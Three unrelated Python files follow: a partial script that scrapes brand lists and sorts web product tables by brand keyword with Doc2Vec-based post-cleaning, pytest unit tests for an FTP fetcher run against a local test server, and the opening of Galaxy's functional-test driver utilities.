'aquaphor', 'schick', 'differin', 'garnier', 'l’oréal paris', "l'oréal paris", 'revlon',
'cetaphil','roc', "burt's bees", "burt’s bees", 'sonia kashuk', 'pantene', 'aveeno', 'no7',
'rimell', 'wet n wild']
brands_dict['drugstore'] = list(set(brands_dict['drugstore']))
# for tools
tools_list1 = ['makita', 'bosch', 'dewalt', 'craftsman', 'stanley black & decker', 'ridgid tools', 'ridgid',
'kobalt', 'skil', 'husky tools', 'irwin', 'ryobi', 'milwaukee', 'ames', 'arrow', 'bostitch',
'channellock', 'cmt', 'dremel', 'duo-fast', 'estwing', 'freud', 'grip-rite', 'hilti',
'hitachi', 'irwin tools', 'leatherman', 'little giant ladder', 'marshalltown',
'master magnetics', 'paslode', 'porter-cable', 'red devil', 'rockwell automation', 'stabila',
'stanley', 'stiletto', 'vermont american', 'wener ladder', 'metabo hpt', 'festool', 'mafell',
'knipex', 'wiha', 'ingersoll-rand', 'senco', 'greenlee', 'knaack', 'caterpillar']
tools_list2 = []
# only if we want more here
tools_html = urlopen('https://www.toolup.com/shop-by-brand')
tools_bsObj = BeautifulSoup(tools_html.read(), 'lxml')
tools_lines = tools_bsObj.find_all('div', {'class':'brand-group'})
for tools_line in tools_lines:
tools_brand = tools_line.find_all('li')
for element in tools_brand:
tools_br = element.get_text().lower()
tools_list2.append(tools_br)
brands_dict['tools'] = list(set(tools_list1 + tools_list2))
# for cars
cars_list = []
req = Request('https://www.thetrendspotter.net/popular-car-brands/', headers={'User-Agent': 'Mozilla/5.0'})
cars_html = urlopen(req)
cars_bsObj = BeautifulSoup(cars_html.read(), 'lxml')
cars_lines = cars_bsObj.find_all('h2')
for cars_line in cars_lines:
if len(cars_line.get_text().split('. ')) > 1:
cars_brand = cars_line.get_text().split('. ')[1].lower()
cars_list.append(cars_brand)
cars_list += ['mercedes benz', 'vw', 'yamaha', 'ferrari', 'bentley', 'ram trucks', 'pontiac', 'oldsmobile', 'maserati',
'aston martin', 'bugatti', 'fiat', 'saab', 'suzuki', 'renault', 'peugeot', 'daewoo', 'studebaker',
'hudson', 'citroen', 'mg']
brands_dict['cars'] = list(set(cars_list))
# for technology
brands_dict['technology'] = ['samsung', '3m', 'abb', 'philips', 'schneider electric', 'sennheiser', 'siemens']
# modify in general manually
brands_dict['clothes'] += ['billabong', 'breitling', 'fila', 'hilfiger', 'pandora', 'ray-ban', 'rayban',
'timberland', 'new era', 'bosch']
brands_dict['clothes'] = list(set(brands_dict['clothes']))
brands_dict['electronics_total'] += ['huawei', 'logitech']
#brands_dict['electronics_total'].remove('samsung')
brands_dict['electronics_total'] = list(set(brands_dict['electronics_total']))
"""
random_brands = ['2-POWER', '2-Power', 'A&I Parts', 'ANGELIC DIAMONDS', 'Allison Kaufman',
'American Olean', 'Anuradha Art Jewellery', 'Ariat', 'Bijou Brigitte',
'Birkenstock', 'Black Diamond', 'Brilliant Earth', 'Caratlane', 'Carhartt', 'Casio',
'Chekich', 'DWS Jewellery', 'Dakine', 'Eastpak', 'Emporio Armani', 'Epson',
'Garmin', 'Garrett', 'Hamilton', 'Hopscotch', 'JBL', 'Jordan', 'Kawasaki',
'Kingston', 'LEGO', 'MSI', 'Medline', 'Peacocks', 'Pink Boutique',
'Reebok', 'Rembrandt Charms', 'SanDisk', 'SareesBazaar',
'Select Fashion', 'Toshiba', 'Tumi', 'Unionwear', 'United Colors of Benetton',
'VOYLLA', 'Vera Bradley', 'Wilson', 'Xerox', 'baginning', 'dorothyperkins', 'evans',
'nihaojewelry.com', 'topman']
random_brands = list(set(brand.lower() for brand in random_brands))
brands_dict['random'] = random_brands
with open(os.path.join(product_path, 'brands_dict.json'), 'w', encoding='utf-8') as f:
json.dump(brands_dict, f)
def clean_keywords():
print('clean keywords')
with open(os.path.join(product_path, 'brands_dict.json'), 'r', encoding='utf-8') as f:
brands_dict = json.load(f)
brands_dict['clothes_cleaned'] = ['prada', 'calvin klein', 'louis vuitton', 'under armour', 'the north face',
'tommy hilfiger', 'dolce & gabbana', 'adidas', 'puma', 'oakley', 'dior', 'chanel',
'gap',
'gucci', 'michael kors', 'patagonia', 'moncler', 'armani', 'burberry', 'nike']
brands_dict['electronics_cleaned'] = ['lenovo', 'canon', 'hitachi', 'resonant', 'sony', 'nvidia', 'nintendo',
'apple',
'samsung', 'yaskawa', 'asus', 'dell', 'hp', 'amd', 'nikon', 'xiaomi', 'cisco',
'panasonic', 'intel', 'flex']
with open(os.path.join(product_path, 'brands_dict.json'), 'w', encoding='utf-8') as f:
json.dump(brands_dict, f)
def keyword_search(data_path):
"""
product selection for phase 1b;
selects only "electronic products" for structured data and "clothes" for unstructured data
:return: two dictionaries for electronics, clothes each containing table and row ids
"""
print('run keyword search')
with open(os.path.join(product_path, 'brands_dict.json'), 'r', encoding='utf-8') as f:
brands_dict = json.load(f)
data_files = [file for file in os.listdir(data_path) if file.endswith('.json.gz')]
# for testing
# brands_dict['clothes_cleaned'].append('nejron') ##
# brands_dict['electronics_cleaned'].append('arip santoso') ##
entity = data_path.split('product_')[1]
print(entity)
# check whether dictionaries already exist
if os.path.isfile(os.path.join(product_path, 'product_clothes_v3', 'clothes_dict.json')):
with open(os.path.join(product_path, 'product_clothes_v3', 'clothes_dict.json'), 'r', encoding='utf-8') as f:
clothes_dict = json.load(f)
else:
clothes_dict = {'top100/cleaned': {key: [] for key in brands_dict['clothes']},
'minimum3/cleaned': {key: [] for key in brands_dict['clothes']}}
if os.path.isfile(os.path.join(product_path, 'product_electronics_v3', 'electronics_dict.json')):
with open(os.path.join(product_path, 'product_electronics_v3', 'electronics_dict.json'), 'r',
encoding='utf-8') as f:
electronics_dict = json.load(f)
else:
electronics_dict = {'top100/cleaned': {key: [] for key in brands_dict['electronics_total']},
'minimum3/cleaned': {key: [] for key in brands_dict['electronics_total']}}
if os.path.isfile(os.path.join(product_path, 'product_bikes', 'bikes_dict.json')):
with open(os.path.join(product_path, 'product_bikes', 'bikes_dict.json'), 'r', encoding='utf-8') as f:
bikes_dict = json.load(f)
else:
bikes_dict = {'top100/cleaned': {key: [] for key in brands_dict['bikes']},
'minimum3/cleaned': {key: [] for key in brands_dict['bikes']}}
if os.path.isfile(os.path.join(product_path, 'product_drugstore', 'drugstore_dict.json')):
with open(os.path.join(product_path, 'product_drugstore', 'drugstore_dict.json'), 'r', encoding='utf-8') as f:
drugstore_dict = json.load(f)
else:
drugstore_dict = {'top100/cleaned': {key: [] for key in brands_dict['drugstore']},
'minimum3/cleaned': {key: [] for key in brands_dict['drugstore']}}
if os.path.isfile(os.path.join(product_path, 'product_tools', 'tools_dict.json')):
with open(os.path.join(product_path, 'product_tools', 'tools_dict.json'), 'r', encoding='utf-8') as f:
tools_dict = json.load(f)
else:
tools_dict = {'top100/cleaned': {key: [] for key in brands_dict['tools']},
'minimum3/cleaned': {key: [] for key in brands_dict['tools']}}
if os.path.isfile(os.path.join(product_path, 'product_technology', 'technology_dict.json')):
with open(os.path.join(product_path, 'product_technology', 'technology_dict.json'), 'r', encoding='utf-8') as f:
technology_dict = json.load(f)
else:
technology_dict = {'top100/cleaned': {key: [] for key in brands_dict['technology']},
'minimum3/cleaned': {key: [] for key in brands_dict['technology']}}
if os.path.isfile(os.path.join(product_path, 'product_cars', 'cars_dict.json')):
with open(os.path.join(product_path, 'product_cars', 'cars_dict.json'), 'r', encoding='utf-8') as f:
cars_dict = json.load(f)
else:
cars_dict = {'top100/cleaned': {key: [] for key in brands_dict['cars']},
'minimum3/cleaned': {key: [] for key in brands_dict['cars']}}
if os.path.isfile(os.path.join(product_path, 'product_random', 'random_dict.json')):
with open(os.path.join(product_path, 'product_random', 'random_dict.json'), 'r', encoding='utf-8') as f:
random_dict = json.load(f)
else:
random_dict = {'top100/cleaned': {key: [] for key in brands_dict['random']},
'minimum3/cleaned': {key: [] for key in brands_dict['random']}}
count = 0
with progressbar.ProgressBar(max_value=len(data_files)) as bar:
for data_file in data_files:
# if data_file == 'Product_3dcartstores.com_September2020.json.gz': ## for testing
df = pd.read_json(os.path.join(data_path, '{}'.format(data_file)), compression='gzip', lines=True)
clothes_row_ids = []
electronics_row_ids = []
bikes_row_ids = []
drugstore_row_ids = []
tools_row_ids = []
technology_row_ids = []
cars_row_ids = []
random_row_ids = []
# iterrate over rows and look for keywords
if 'brand' in df.columns: # check whether column 'brand' exists
for i in range(df.shape[0]): # iterate over rows
# if i < 1000: # only for testing
row_id = int(df['row_id'][i])
cell = df['brand'][i]
if cell != None:
cell = str(cell).lower()
if cell in brands_dict['clothes']:
clothes_dict[entity][cell].append((data_file, row_id))
clothes_row_ids.append(row_id)
elif cell in brands_dict['electronics_total']:
electronics_dict[entity][cell].append((data_file, row_id))
electronics_row_ids.append(row_id)
elif cell in brands_dict['bikes']:
bikes_dict[entity][cell].append((data_file, row_id))
bikes_row_ids.append(row_id)
elif cell in brands_dict['cars']:
cars_dict[entity][cell].append((data_file, row_id))
cars_row_ids.append(row_id)
elif cell in brands_dict['technology']:
technology_dict[entity][cell].append((data_file, row_id))
technology_row_ids.append(row_id)
elif cell in brands_dict['tools']:
tools_dict[entity][cell].append((data_file, row_id))
tools_row_ids.append(row_id)
elif cell in brands_dict['drugstore']:
drugstore_dict[entity][cell].append((data_file, row_id))
drugstore_row_ids.append(row_id)
elif cell in brands_dict['random']:
random_dict[entity][cell].append((data_file, row_id))
random_row_ids.append(row_id)
elif 'name' in df.columns: # if column 'brand' does not exist check for first word in name column
df['brand'] = ''
# iterrate over rows
for i in range(df.shape[0]):
row_id = int(df['row_id'][i])
if df['name'][i] != None:
name_split_list = str(df['name'][i]).split(' ')
# check for first word in name column
cell = str(name_split_list[0]).lower()
if cell in brands_dict['electronics_total']:
electronics_dict[entity][cell].append((data_file, row_id))
electronics_row_ids.append(row_id)
df.at[i, 'brand'] = cell
elif cell in brands_dict['clothes']:
clothes_dict[entity][cell].append((data_file, row_id))
clothes_row_ids.append(row_id)
df.at[i, 'brand'] = cell
elif cell in brands_dict['bikes']:
bikes_dict[entity][cell].append((data_file, row_id))
bikes_row_ids.append(row_id)
df.at[i, 'brand'] = cell
elif cell in brands_dict['cars']:
cars_dict[entity][cell].append((data_file, row_id))
cars_row_ids.append(row_id)
df.at[i, 'brand'] = cell
elif cell in brands_dict['technology']:
technology_dict[entity][cell].append((data_file, row_id))
technology_row_ids.append(row_id)
df.at[i, 'brand'] = cell
elif cell in brands_dict['tools']:
tools_dict[entity][cell].append((data_file, row_id))
tools_row_ids.append(row_id)
df.at[i, 'brand'] = cell
elif cell in brands_dict['drugstore']:
drugstore_dict[entity][cell].append((data_file, row_id))
drugstore_row_ids.append(row_id)
df.at[i, 'brand'] = cell
elif cell in brands_dict['random']:
random_dict[entity][cell].append((data_file, row_id))
random_row_ids.append(row_id)
df.at[i, 'brand'] = cell
elif len(name_split_list) > 1:
# check for two words (since ngrams brands)
cell = cell + ' ' + str(name_split_list[1]).lower()
if cell in brands_dict['electronics_total']:
electronics_dict[entity][cell].append((data_file, row_id))
electronics_row_ids.append(row_id)
df.at[i, 'brand'] = cell
elif cell in brands_dict['clothes']:
clothes_dict[entity][cell].append((data_file, row_id))
clothes_row_ids.append(row_id)
df.at[i, 'brand'] = cell
elif cell in brands_dict['bikes']:
bikes_dict[entity][cell].append((data_file, row_id))
bikes_row_ids.append(row_id)
df.at[i, 'brand'] = cell
elif cell in brands_dict['cars']:
cars_dict[entity][cell].append((data_file, row_id))
cars_row_ids.append(row_id)
df.at[i, 'brand'] = cell
elif cell in brands_dict['technology']:
technology_dict[entity][cell].append((data_file, row_id))
technology_row_ids.append(row_id)
df.at[i, 'brand'] = cell
elif cell in brands_dict['tools']:
tools_dict[entity][cell].append((data_file, row_id))
tools_row_ids.append(row_id)
df.at[i, 'brand'] = cell
elif cell in brands_dict['drugstore']:
drugstore_dict[entity][cell].append((data_file, row_id))
drugstore_row_ids.append(row_id)
df.at[i, 'brand'] = cell
elif cell in brands_dict['random']:
random_dict[entity][cell].append((data_file, row_id))
random_row_ids.append(row_id)
df.at[i, 'brand'] = cell
elif len(name_split_list) > 2:
# check for three words (since ngrams brands)
cell = cell + ' ' + str(name_split_list[2]).lower()
if cell in brands_dict['electronics_total']:
electronics_dict[entity][cell].append((data_file, row_id))
electronics_row_ids.append(row_id)
df.at[i, 'brand'] = cell
elif cell in brands_dict['clothes']:
clothes_dict[entity][cell].append((data_file, row_id))
clothes_row_ids.append(row_id)
df.at[i, 'brand'] = cell
elif cell in brands_dict['bikes']:
bikes_dict[entity][cell].append((data_file, row_id))
bikes_row_ids.append(row_id)
df.at[i, 'brand'] = cell
elif cell in brands_dict['cars']:
cars_dict[entity][cell].append((data_file, row_id))
cars_row_ids.append(row_id)
df.at[i, 'brand'] = cell
elif cell in brands_dict['technology']:
technology_dict[entity][cell].append((data_file, row_id))
technology_row_ids.append(row_id)
df.at[i, 'brand'] = cell
elif cell in brands_dict['tools']:
tools_dict[entity][cell].append((data_file, row_id))
tools_row_ids.append(row_id)
df.at[i, 'brand'] = cell
elif cell in brands_dict['drugstore']:
drugstore_dict[entity][cell].append((data_file, row_id))
drugstore_row_ids.append(row_id)
df.at[i, 'brand'] = cell
elif cell in brands_dict['random']:
random_dict[entity][cell].append((data_file, row_id))
random_row_ids.append(row_id)
df.at[i, 'brand'] = cell
elif len(name_split_list) > 3:
# check for four words (since ngrams brands)
cell = cell + ' ' + str(name_split_list[2]).lower()
if cell in brands_dict['electronics_total']:
electronics_dict[entity][cell].append((data_file, row_id))
electronics_row_ids.append(row_id)
df.at[i, 'brand'] = cell
elif cell in brands_dict['clothes']:
clothes_dict[entity][cell].append((data_file, row_id))
clothes_row_ids.append(row_id)
df.at[i, 'brand'] = cell
elif cell in brands_dict['bikes']:
bikes_dict[entity][cell].append((data_file, row_id))
bikes_row_ids.append(row_id)
df.at[i, 'brand'] = cell
elif cell in brands_dict['cars']:
cars_dict[entity][cell].append((data_file, row_id))
cars_row_ids.append(row_id)
df.at[i, 'brand'] = cell
elif cell in brands_dict['technology']:
technology_dict[entity][cell].append((data_file, row_id))
technology_row_ids.append(row_id)
df.at[i, 'brand'] = cell
elif cell in brands_dict['tools']:
tools_dict[entity][cell].append((data_file, row_id))
tools_row_ids.append(row_id)
df.at[i, 'brand'] = cell
elif cell in brands_dict['drugstore']:
drugstore_dict[entity][cell].append((data_file, row_id))
drugstore_row_ids.append(row_id)
df.at[i, 'brand'] = cell
elif cell in brands_dict['random']:
random_dict[entity][cell].append((data_file, row_id))
random_row_ids.append(row_id)
df.at[i, 'brand'] = cell
count += 1
bar.update(count)
# write selected data into seperate folders
clothes_df = df[df['row_id'].isin(clothes_row_ids)]
electronics_df = df[df['row_id'].isin(electronics_row_ids)]
bikes_df = df[df['row_id'].isin(bikes_row_ids)]
cars_df = df[df['row_id'].isin(cars_row_ids)]
technology_df = df[df['row_id'].isin(technology_row_ids)]
tools_df = df[df['row_id'].isin(tools_row_ids)]
drugstore_df = df[df['row_id'].isin(drugstore_row_ids)]
random_df = df[df['row_id'].isin(random_row_ids)]
if clothes_df.shape[0] > 0:
clothes_df.to_json(os.path.join(product_path, 'product_clothes_v3', data_file), compression='gzip',
orient='records',
lines=True)
if electronics_df.shape[0] > 0:
electronics_df.to_json(os.path.join(product_path, 'product_electronics_v3', data_file),
compression='gzip', orient='records',
lines=True)
if bikes_df.shape[0] > 0:
bikes_df.to_json(os.path.join(product_path, 'product_bikes', data_file),
compression='gzip', orient='records',
lines=True)
if cars_df.shape[0] > 0:
cars_df.to_json(os.path.join(product_path, 'product_cars', data_file),
compression='gzip', orient='records',
lines=True)
if technology_df.shape[0] > 0:
technology_df.to_json(os.path.join(product_path, 'product_technology', data_file),
compression='gzip', orient='records',
lines=True)
if tools_df.shape[0] > 0:
tools_df.to_json(os.path.join(product_path, 'product_tools', data_file),
compression='gzip', orient='records',
lines=True)
if drugstore_df.shape[0] > 0:
drugstore_df.to_json(os.path.join(product_path, 'product_drugstore', data_file),
compression='gzip', orient='records',
lines=True)
if random_df.shape[0] > 0:
random_df.to_json(os.path.join(product_path, 'product_random', data_file),
compression='gzip', orient='records',
lines=True)
## nur alle paar tausend saven
# save dictionaries with selected data
if count % 1000 == 0:
with open(os.path.join(product_path, 'product_clothes', 'clothes_dict.json'), 'w',
encoding='utf-8') as f:
json.dump(clothes_dict, f)
with open(os.path.join(product_path, 'product_electronics', 'electronics_dict.json'), 'w',
encoding='utf-8') as f:
json.dump(electronics_dict, f)
with open(os.path.join(product_path, 'product_bikes', 'bikes_dict.json'), 'w',
encoding='utf-8') as f:
json.dump(bikes_dict, f)
with open(os.path.join(product_path, 'product_cars', 'cars_dict.json'), 'w', encoding='utf-8') as f:
json.dump(cars_dict, f)
with open(os.path.join(product_path, 'product_technology', 'technology_dict.json'), 'w',
encoding='utf-8') as f:
json.dump(technology_dict, f)
with open(os.path.join(product_path, 'product_tools', 'tools_dict.json'), 'w',
encoding='utf-8') as f:
json.dump(tools_dict, f)
with open(os.path.join(product_path, 'product_drugstore', 'drugstore_dict.json'), 'w',
encoding='utf-8') as f:
json.dump(drugstore_dict, f)
with open(os.path.join(product_path, 'product_random', 'random_dict.json'), 'w',
encoding='utf-8') as f:
json.dump(random_dict, f)
# save at the end of running
with open(os.path.join(product_path, 'product_clothes_v3', 'clothes_dict.json'), 'w', encoding='utf-8') as f:
json.dump(clothes_dict, f)
with open(os.path.join(product_path, 'product_electronics_v3', 'electronics_dict.json'), 'w',
encoding='utf-8') as f:
json.dump(electronics_dict, f)
with open(os.path.join(product_path, 'product_bikes', 'bikes_dict.json'), 'w', encoding='utf-8') as f:
json.dump(bikes_dict, f)
with open(os.path.join(product_path, 'product_cars', 'cars_dict.json'), 'w', encoding='utf-8') as f:
json.dump(cars_dict, f)
with open(os.path.join(product_path, 'product_technology', 'technology_dict.json'), 'w', encoding='utf-8') as f:
json.dump(technology_dict, f)
with open(os.path.join(product_path, 'product_tools', 'tools_dict.json'), 'w', encoding='utf-8') as f:
json.dump(tools_dict, f)
with open(os.path.join(product_path, 'product_drugstore', 'drugstore_dict.json'), 'w', encoding='utf-8') as f:
json.dump(drugstore_dict, f)
with open(os.path.join(product_path, 'product_random', 'random_dict.json'), 'w', encoding='utf-8') as f:
json.dump(random_dict, f)
def remove_stopwords(token_vector, stopwords_list):
return token_vector.apply(lambda token_list: [word for word in token_list if word not in stopwords_list])
def remove_punctuation(token_vector):
return token_vector.apply(lambda token_list: [word for word in token_list if word not in string.punctuation])
def jaccard_similarity_score(original, translation):
intersect = set(original).intersection(set(translation))
union = set(original).union(set(translation))
try:
return len(intersect) / len(union)
except ZeroDivisionError:
return 0
def post_cleaning():
"""
Measures the similarity within a cluster_id of our final electronics and clothes entities and removes the ones which do not fit the scores
Post-processing.
:return:
"""
entities = ['Bikes', 'Cars', 'Clothes', 'Drugstore', 'Electronics', 'Technology', 'Tools', 'Random']
# entities = ['Tools']
# generate lists for valid electronics and clothes brands
with open(os.path.join(product_path, 'brands_dict.json'), 'r', encoding='utf-8') as f:
brands_dict = json.load(f)
# read final dataframes with all cluster_ids left
for entity in entities:
print('Running post-processing for {}'.format(entity))
clusters_all_df = pd.read_csv(
os.path.join(cluster_path, '{}_clusters_all_8_tables.csv'.format(entity)),
index_col=None)
final_entities_list = list(set(clusters_all_df['cluster_id']))
# lowercase name column for similarity measure
clusters_all_df['name'] = clusters_all_df['name'].apply(lambda row: str(row).lower())
# use tokenizer for name column to get tokens for training the model, remove stopwords and punctuation
clusters_all_df['tokens'] = clusters_all_df['name'].apply(lambda row: word_tokenize(row))
clusters_all_df['tokens'] = remove_stopwords(clusters_all_df['tokens'], stopwords.words())
clusters_all_df['tokens'] = remove_punctuation(clusters_all_df['tokens'])
# get tagged words
tagged_data = [TaggedDocument(words=_d, tags=[str(i)]) for i, _d in
enumerate(clusters_all_df['tokens'])]
# build model and vocabulary
model = Doc2Vec(vector_size=50, min_count=5, epochs=25, dm=0)
model.build_vocab(tagged_data)
# Train model
model.train(tagged_data, total_examples=model.corpus_count, epochs=25)
# compare for all cluster_ids the similarity between the entries within a cluster_id
if entity == 'Electronics':
all_valid_brands = brands_dict['electronics_total']
else:
all_valid_brands = brands_dict[entity.lower()]
valid_indices_all = []
print('measure similarity')
count = 0
with progressbar.ProgressBar(max_value=len(final_entities_list)) as bar:
for cluster_id in final_entities_list:
single_cluster_id_df = clusters_all_df[clusters_all_df['cluster_id'] == cluster_id]
# measure similarity with Doc2Vec
valid_brands = list(filter(lambda brand: brand in all_valid_brands,
single_cluster_id_df['brand_y'].apply(lambda element: str(element).lower())))
if len(valid_brands) > 0:
most_common_brand = max(valid_brands, key=valid_brands.count)
index_most_common = single_cluster_id_df[single_cluster_id_df['brand_y'].apply(
lambda element: str(element).lower()) == most_common_brand].index[
0] # use this as baseline for similarity comparisons within a certain cluster
# calculate similarity and filter for the ones which are in the current cluster
similar_doc = model.docvecs.most_similar(f'{index_most_common}', topn=clusters_all_df.shape[0])
similar_doc_cluster = [tup for tup in similar_doc if int(tup[0]) in list(
single_cluster_id_df.index)] # similarities as tuples with index and similarity measure compared to baseline product
similar_doc_cluster_df = pd.DataFrame(list(similar_doc_cluster), columns=['index', 'doc2vec'])
similar_doc_cluster_df['index'] = [int(i) for i in
similar_doc_cluster_df['index']] # change indices to numbers
# measure similarity with Jaccard
jaccard_score = single_cluster_id_df['name'].apply(lambda row: jaccard_similarity_score(
row, single_cluster_id_df['name'].loc[int(index_most_common)]))
jaccard_score = jaccard_score.drop(int(index_most_common)).sort_values(ascending=False)
jaccard_score_df = pd.DataFrame({'index': jaccard_score.index, 'jaccard': jaccard_score.values})
# merge both similarity measures to one dataframe
similarity_df = pd.merge(similar_doc_cluster_df, jaccard_score_df, left_on='index',
right_on='index', how='left')
# select valid cluster_ids by setting thresholds for doc2vec and jaccard similarities
if entity == 'Bikes':
doc2vec_threshold = 0.97
jaccard_theshold = 0.6
elif entity == 'Cars':
doc2vec_threshold = 0.97
jaccard_theshold = 0.6
elif entity == 'Clothes':
doc2vec_threshold = 0.97
jaccard_theshold = 0.6
elif entity == 'Drugstore':
doc2vec_threshold = 0.98
jaccard_theshold = 0.6
elif entity == 'Electronics':
doc2vec_threshold = 0.97
jaccard_theshold = 0.5
elif entity == 'Technology':
doc2vec_threshold = 0.98
jaccard_theshold = 0.6
elif entity == 'Tools':
doc2vec_threshold = 0.97
jaccard_theshold = 0.6
valid_cluster_id_df = similarity_df[(similarity_df['doc2vec'] > doc2vec_threshold) |
(similarity_df['jaccard'] >= jaccard_theshold)]
valid_cluster_id_indices = valid_cluster_id_df[
'index'].to_list() # list of valid indices within a cluster_id
valid_indices_all += valid_cluster_id_indices
count += 1
bar.update(count)
clusters_all_df_new = clusters_all_df[clusters_all_df.index.isin(valid_indices_all)]
clusters_all_df_new.to_csv(
os.path.join(cluster_path, '{}_clusters_all_8_tables_post_processed.csv'.format(entity)),
columns=None)
### Also exclude same table_ids
if __name__ == "__main__":
# for multithreading
os.environ['NUMEXPR_MAX_THREADS'] = '24'
format = "%(asctime)s: %(message)s"
logging.basicConfig(format=format, level=logging.INFO,
datefmt="%H:%M:%S")
logging.info("Main : before creating thread")
x = threading.Thread(target=thread_function, args=(1,))
logging.info("Main : before running thread")
x.start()
logging.info("Main : wait for the thread to finish")
# x.join()
logging.info("Main : all done")
"""
# for multiprocessing
sites = [
"https://www.jython.org",
"http://olympus.realpython.org/dice",
] * 80
start_time = time.time()
download_all_sites(sites)
duration = time.time() - start_time
print(f"Downloaded {len(sites)} in {duration} seconds")
"""
# run functions
# clean_clusters()
# get_keywords() ##
# clean_keywords()
keyword_search(cleaned_top100_path)
keyword_search(cleaned_min3_path)
# post_cleaning()
# get_new_keywords()
test = 2
|
test_ftp.py
|
"""Unit tests for cutty.repositories.adapters.fetchers.ftp."""
import os
from collections.abc import Iterator
from pathlib import Path
from threading import Event
from threading import Thread
import pytest
from pyftpdlib.authorizers import DummyAuthorizer
from pyftpdlib.handlers import FTPHandler
from pyftpdlib.servers import FTPServer
from yarl import URL
from cutty.repositories.adapters.fetchers.ftp import ftpfetcher
from cutty.repositories.domain.stores import Store
@pytest.fixture
def repository(tmp_path: Path) -> Path:
"""Fixture for a repository."""
path = tmp_path / "repository.txt"
path.write_text("Lorem")
return path
@pytest.fixture
def server(repository: Path) -> Iterator[URL]:
"""Fixture for an FTP server exposing the repository."""
# Bind to 127.0.0.1 not localhost, because IPv6 is not supported.
# (urllib.request.FTPHandler uses socket.gethostbyname.)
address = ("127.0.0.1", 0)
timeout = 0.001 if os.environ.get("CI") else 0.000001
handler = FTPHandler
handler.authorizer = DummyAuthorizer()
handler.authorizer.add_anonymous(str(repository.parent))
with FTPServer(address, handler) as server:
done = Event()
shutdown = False
def run() -> None:
try:
while not shutdown:
server.serve_forever(timeout=timeout, blocking=False)
finally:
done.set()
thread = Thread(target=run, daemon=True)
thread.start()
host, port = server.address
path = f"/{repository.name}"
yield URL.build(scheme="ftp", host=host, port=port, path=path)
shutdown = True
done.wait()
thread.join()
def test_happy(server: URL, store: Store, repository: Path) -> None:
"""It downloads the file."""
path = ftpfetcher(server, store)
assert path is not None
assert path.read_text() == repository.read_text()
def test_not_matched(store: Store) -> None:
"""It returns None if the URL does not use the ftp scheme."""
url = URL("file:///")
path = ftpfetcher(url, store)
assert path is None
def test_not_found(server: URL, store: Store) -> None:
"""It raises an exception if the server responds with an error."""
with pytest.raises(Exception):
ftpfetcher(server.with_name("bogus"), store)
def test_update(server: URL, store: Store, repository: Path) -> None:
"""It updates a file from a previous fetch."""
ftpfetcher(server, store)
repository.write_text("ipsum")
path = ftpfetcher(server, store)
assert path is not None
assert path.read_text() == repository.read_text()
|
driver_util.py
|
"""Scripts for drivers of Galaxy functional tests."""
import http.client
import logging
import os
import random
import re
import shlex
import shutil
import signal
import string
import subprocess
import sys
import tempfile
import threading
import time
from urllib.parse import urlparse
import nose.config
import nose.core
import nose.loader
import nose.plugins.manager
import yaml
from paste import httpserver
from sqlalchemy_utils import (
create_database,
database_exists,
)
from galaxy.app import UniverseApplication as GalaxyUniverseApplication
from galaxy.config import LOGGING_CONFIG_DEFAULT
from galaxy.model import mapping
from galaxy.model.tool_shed_install import mapping as toolshed_mapping
from galaxy.tool_util.verify.interactor import GalaxyInteractorApi, verify_tool
from galaxy.util import asbool, download_to_file, galaxy_directory
from galaxy.util.properties import load_app_properties
from galaxy.web import buildapp
from galaxy_test.base.api_util import get_master_api_key, get_user_api_key
from galaxy_test.base.env import (
DEFAULT_WEB_HOST,
target_url_parts,
)
from galaxy_test.base.instrument import StructuredTestDataPlugin
from galaxy_test.base.nose_util import run
from tool_shed.webapp.app import UniverseApplication as ToolshedUniverseApplication
from .test_logging import logging_config_file
galaxy_root = galaxy_directory()
DEFAULT_CONFIG_PREFIX = "GALAXY"
GALAXY_TEST_DIRECTORY = os.path.join(galaxy_root, "test")
GALAXY_TEST_FILE_DIR = "test-data,https://github.com/galaxyproject/galaxy-test-data.git"
TOOL_SHED_TEST_DATA = os.path.join(galaxy_root, "lib", "tool_shed", "test", "test_data")
TEST_WEBHOOKS_DIR = os.path.join(galaxy_root, "test", "functional", "webhooks")
FRAMEWORK_TOOLS_DIR = os.path.join(GALAXY_TEST_DIRECTORY, "functional", "tools")
FRAMEWORK_UPLOAD_TOOL_CONF = os.path.join(FRAMEWORK_TOOLS_DIR, "upload_tool_conf.xml")
FRAMEWORK_SAMPLE_TOOLS_CONF = os.path.join(FRAMEWORK_TOOLS_DIR, "samples_tool_conf.xml")
FRAMEWORK_DATATYPES_CONF = os.path.join(FRAMEWORK_TOOLS_DIR, "sample_datatypes_conf.xml")
MIGRATED_TOOL_PANEL_CONFIG = 'config/migrated_tools_conf.xml'
INSTALLED_TOOL_PANEL_CONFIGS = [
os.environ.get('GALAXY_TEST_SHED_TOOL_CONF', 'config/shed_tool_conf.xml')
]
REALTIME_PROXY_TEMPLATE = string.Template(r"""
uwsgi:
http-raw-body: true
interactivetools_map: $tempdir/interactivetools_map.sqlite
python-raw: scripts/interactivetools/key_type_token_mapping.py
# if interactive tool path, jump to interactive tool, else skip to
# endendend (default uwsgi params).
route-host: ^([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)-([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)\.([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)\.(interactivetool\.$test_host:$test_port)$ goto:interactivetool
route-run: goto:endendend
route-label: interactivetool
route-host: ^([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)-([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)\.([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)\.(interactivetool\.$test_host:$test_port)$ rpcvar:TARGET_HOST rtt_key_type_token_mapper_cached $1 $3 $2 $4 $0 5
route-if-not: empty:${TARGET_HOST} httpdumb:${TARGET_HOST}
route: .* break:404 Not Found
route-label: endendend
""")
DEFAULT_LOCALES = "en"
log = logging.getLogger("test_driver")
# Global variables to pass database contexts around - only needed for older
# Tool Shed twill tests that didn't utilize the API for such interactions.
galaxy_context = None
tool_shed_context = None
install_context = None
def setup_tool_shed_tmp_dir():
tool_shed_test_tmp_dir = os.environ.get('TOOL_SHED_TEST_TMP_DIR', None)
if tool_shed_test_tmp_dir is None:
tool_shed_test_tmp_dir = os.path.realpath(tempfile.mkdtemp())
# Here's the directory where everything happens. Temporary directories are created within this directory to contain
# the hgweb.config file, the database, new repositories, etc. Since the tool shed browses repository contents via HTTP,
# the full path to the temporary directroy wher eht repositories are located cannot contain invalid url characters.
os.environ['TOOL_SHED_TEST_TMP_DIR'] = tool_shed_test_tmp_dir
return tool_shed_test_tmp_dir
def get_galaxy_test_tmp_dir():
